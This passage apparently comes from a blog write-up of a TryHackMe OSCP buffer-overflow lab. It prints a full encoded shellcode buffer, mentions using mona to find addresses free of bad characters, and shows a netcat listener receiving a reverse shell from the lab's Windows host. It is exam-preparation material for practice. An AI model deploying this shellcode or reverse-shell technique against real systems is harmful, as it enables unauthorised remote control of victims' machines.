Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of py file: 1700 bytes
buf =  b""
buf += b"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += b"\x76\x0e\x1b\x4f\x7c\x1f\x83\xee\xfc\xe2\xf4\xe7\xa7"
buf += b"\xfe\x1f\x1b\x4f\x1c\x96\xfe\x7e\xbc\x7b\x90\x1f\x4c"
buf += b"\x94\x49\x43\xf7\x4d\x0f\xc4\x0e\x37\x14\xf8\x36\x39"
buf += b"\x2a\xb0\xd0\x23\x7a\x33\x7e\x33\x3b\x8e\xb3\x12\x1a"
buf += b"\x88\x9e\xed\x49\x18\xf7\x4d\x0b\xc4\x36\x23\x90\x03"
buf += b"\x6d\x67\xf8\x07\x7d\xce\x4a\xc4\x25\x3f\x1a\x9c\xf7"
buf += b"\x56\x03\xac\x46\x56\x90\x7b\xf7\x1e\xcd\x7e\x83\xb3"
buf += b"\xda\x80\x71\x1e\xdc\x77\x9c\x6a\xed\x4c\x01\xe7\x20"
buf += b"\x32\x58\x6a\xff\x17\xf7\x47\x3f\x4e\xaf\x79\x90\x43"
buf += b"\x37\x94\x43\x53\x7d\xcc\x90\x4b\xf7\x1e\xcb\xc6\x38"
buf += b"\x3b\x3f\x14\x27\x7e\x42\x15\x2d\xe0\xfb\x10\x23\x45"
buf += b"\x90\x5d\x97\x92\x46\x27\x4f\x2d\x1b\x4f\x14\x68\x68"
buf += b"\x7d\x23\x4b\x73\x03\x0b\x39\x1c\xb0\xa9\xa7\x8b\x4e"
buf += b"\x7c\x1f\x32\x8b\x28\x4f\x73\x66\xfc\x74\x1b\xb0\xa9"
buf += b"\x4f\x4b\x1f\x2c\x5f\x4b\x0f\x2c\x77\xf1\x40\xa3\xff"
buf += b"\xe4\x9a\xeb\x75\x1e\x27\x76\x19\x15\xe7\x14\x1d\x1b"
buf += b"\x51\x10\x96\xfd\x25\x6c\x49\x4c\x27\xe5\xba\x6f\x2e"
buf += b"\x83\xca\x9e\x8f\x08\x13\xe4\x01\x74\x6a\xf7\x27\x8c"
buf += b"\xaa\xb9\x19\x83\xca\x73\x2c\x11\x7b\x1b\xc6\x9f\x48"
buf += b"\x4c\x18\x4d\xe9\x71\x5d\x25\x49\xf9\xb2\x1a\xd8\x5f"
buf += b"\x6b\x40\x1e\x1a\xc2\x38\x3b\x0b\x89\x7c\x5b\x4f\x1f"
buf += b"\x2a\x49\x4d\x09\x2a\x51\x4d\x19\x2f\x49\x73\x36\xb0"
buf += b"\x20\x9d\xb0\xa9\x96\xfb\x01\x2a\x59\xe4\x7f\x14\x17"
buf += b"\x9c\x52\x1c\xe0\xce\xf4\x9c\x02\x31\x45\x14\xb9\x8e"
buf += b"\xf2\xe1\xe0\xce\x73\x7a\x63\x11\xcf\x87\xff\x6e\x4a"
buf += b"\xc7\x58\x08\x3d\x13\x75\x1b\x1c\x83\xca"

Next use mona to find all addresses that do not include the bad characters.

kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.80.206] 49272
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

C:\Users\admin\Desktop\vulnerable-apps\oscp>

Conclusion

Thank you Tib3rius for the great room on TryHackMe. I highly recommend going through all 10 buffer overflow exercises if you plan to take the OSCP exam. While going though these you will form your methodology to complete the steps quickly and efficiently, and that is important during the timed OSCP exam.

Until next time, stay safe in the Trenches of IT!

Leave a Reply